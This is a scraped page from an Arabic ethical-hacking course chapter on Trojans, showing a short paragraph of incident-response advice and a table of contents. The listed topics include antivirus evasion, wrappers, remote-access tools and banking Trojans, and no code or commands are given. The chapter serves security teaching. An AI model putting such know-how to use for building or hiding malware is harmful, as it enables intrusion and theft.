‫ﻋﻧدﻣﺎ ﺗﺟد ﺣﺻﺎن طروادة ﻋﻠﻰ اﻟﺟﮭﺎز‪ ،‬ﯾﺟب ﻋزل اﻟﺟﮭﺎز ﻓورا ﻣن اﻟﺷﺑﻛﺔ‪ ،‬ﻗﺑل ان ﯾدﺧل اﻟﺳﯾطرة ﻋﻠﻰ اﻷﻧظﻣﺔ اﻷﺧرى ﻓﻲ اﻟﺷﺑﻛﺔ‪ .‬ﺗﺣﻘﻖ‬
‫ﻣﺎ إذا ﻛﺎن ﯾﺗم ﺗﺣدﯾث ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت أم ﻻ‪.‬‬
‫إذا ﻟم ﯾﺗم ﺗﺣدﯾث ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪ ،‬ﻗم ﺑﺗﺣدﯾﺛﮫ ﺛم ﺗﺷﻐﯾﻠﮫ ﻟﻔﺣص اﻟﻧظﺎم‪ .‬أﻣﺎ إذا ﻛﺎن ﻗد ﺗم ﺗﺣدﯾث ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‬
‫ﺑﺎﻟﻔﻌل‪ ،‬ﻓﯾﻣﻛﻧك إﯾﺟﺎد ﺣﻠول ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻷﺧرى ﻟﺗﻧظﯾف أﺣﺻﻧﺔ طروادة‪.‬‬
‫اﻟﺣﻣد � ﺗﻌﺎﻟﻰ‪ ،‬وﺑﺣول ﷲ ﺗﻌﺎﻟﻰ ﻧﻛون ﻗد اﻧﺗﮭﯾﻧﺎ ﻣن اﻟوﺣدة اﻟﺳﺎدﺳﺔ وﻧﻠﻘﺎﻛم ﻣﻊ اﻟوﺣدة اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬

006 مكتبة رفوف كورس الهاكر الاخلاقي

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

006 مكتبة رفوف كورس الهاكر الاخلاقي

Uploaded by

Copyright:

Available Formats

6

Dr.Mohammed Sobhy Teba

493 .........................................................................................................................................................................................‫( ﻣﻘدﻣﮫ‬6.1)

494 .............. ................................................................................................................................(Trojan Concepts) ‫( ﻣﻔﺎھﯾم اﻟﺗروﺟﺎن‬6.2)

494 . ................................................................................................‫(؟‬What is a Trojan) ‫ﻣﺎ ھو اﻟﺗروﺟﺎن او ﻣﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ ﺣﺻﺎن طروادة‬

495 .............. ................................................................................................ (Purpose Of Trojans) ‫اﻟﻐرض ﻣن اﺳﺗﺧدام ﺣﺻﺎن طروادة‬

498 ...... ................................................................................................................................................................Trojan Infection (6.3)

499 ................... ................................................................................................................................................................ Wrappers

499 .................. ................................................................................................................................ Wrapper Covert Programs

506 ............................................................................................. (Evading Antivirus Techniques) ‫اﻟﺗﮭرب ﻣن ﺗﻘﻧﯾﺎت ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‬

507 ................. ................................................................................................................................ (Type of Trojan) ‫( أﻧواع اﻟﺗروﺟﺎن‬6.3)

507 ...........................................................................................................................................................Command Shell Trojans

508 ........... ................................................................................................................................ Command Shell Trojan: Netcat

509 ................ ................................................................................................................................................................ GUI Trojan

509 ......................................................................................................................................................... Gui Trojan: MoSucker

510 ........ ................................................................................................................................ GUI Trojan: Jumper and Biodox

510 ..... ................................................................................................................................................................Document Trojans

511 ............ ................................................................................................................................................................Email Trojans

511 ............ ................................................................................................................................ Email Trojans: RemoteByMail

512 .. ................................................................................................................................................................ Defacement Trojans

513 ......... ................................................................................................................................ Defacement Trojans: Restorator

513 ........... ................................................................................................................................................................Botnet Trojans

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬

515 ................................................................................................................................................................Proxy Server Trojans

515 .................. ................................................................Proxy Server Trojans: W3bPrOxy Tr0j4nCr34t0r (Funny Name)

516 ............... ................................................................................................................................................................FTP Trojans

516 ........................................................................................................................................................FTP Trojan: TinyFTPD

516 ............. ................................................................................................................................................................ VNC Trojans

517 ......................................................................................................................... VNC Trojans: WinVNC and VNC Stealer

517 ............................................................................................................................................................. HTTP/HTTPS Trojans

518 .................. ................................................................................................................................ HTTP Trojan: HTTP RAT

519 ................. ................................................................................................................................ Shttpd Trojan - HTTPS (SSL)

519 ........ ................................................................................................................................................................ICMP Tunneling

520 .............................................................................................................................................................Remote Access Trojans

520 . ................................................................................................ Remote Access Trojan: Rat DarkComet and Apocalypse

521 ............... ................................................................................................................................ Covert Channel Trojan: CCTT

521 .... ................................................................................................................................................................E-Banking Trojans

522 ...................... ................................................................................................................................Banking Trojan Analysis

522 . ................................................................................................................................ E-Banking Trojan: ZeuS and SpyEye

523 ...... ................................................................................................................................Destructive Trojans: M4sT3r Trojan

523 .. ................................................................................................................................................................ Notification Trojans

524 . ................................................................................................................................................................ Credit Card Trojans

524 ............................................................................................................................. Data Hiding Trojans (Encrypted Trojans)

525 .. ................................................................................................................................................................ OS X Trojan: Crisis

525 ........... ................................................................................................................................MAC OS X Trojan: DNSChanger

526 ................. ................................................................................................................................Mac OS X Trojan: Hell Raiser

527 ......... ................................................................................................................................................................ Trojan Analysis

527 ........................................................................................................................................................ Trojan Analysis: Flame

529 ...................... ................................................................................................................................ Trojan Analysis: SpyEye

530 ................ ................................................................................................................................Trojan Analysis: ZeroAccess

533 ......................................................................................................................................................... Trojan Analysis: Duqu

535 ...................... ................................................................................................................................Trojan Types in Kali Linux

536 ......... ................................................................................................................................ ‫ اﻟﻛﺷف ﻋن اﻟﺗروﺟﺎن‬Trojan Detection (6.5)

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬

536 .......... ................................................................................................(Scanning For Suspicious Ports) ‫اﻟﺑﺣث ﻋن اﻟﻣﻧﺎﻓذ اﻟﻣﺷﺑوھﺔ‬

537 .............. ................................................................................................Port Monitoring Tools: TCPView and Currports

538 . ................................................................................................ (Scanning for Suspicious Processes) ‫اﻟﺑﺣث ﻋن اﻟﻌﻣﻠﯾﺎت اﻟﻣﺷﺑوھﺔ‬

541 ............................................................................................................................. jvl6 PowerTools 2014 -Registry Cleaner

542 ......... ................................................................................................ Registry Entry Monitoring Tool: PC Tools Registry

542 ......... ................................................................................................................................Registry Entry Monitoring Tools

542 . ................................................................................................................................Scanning For Suspicious Device Drivers

543 .................... ................................................................................................ Device Drivers Monitoring Tool: DriverView

544 ......... ................................................................................................................................Device Drivers Monitoring Tools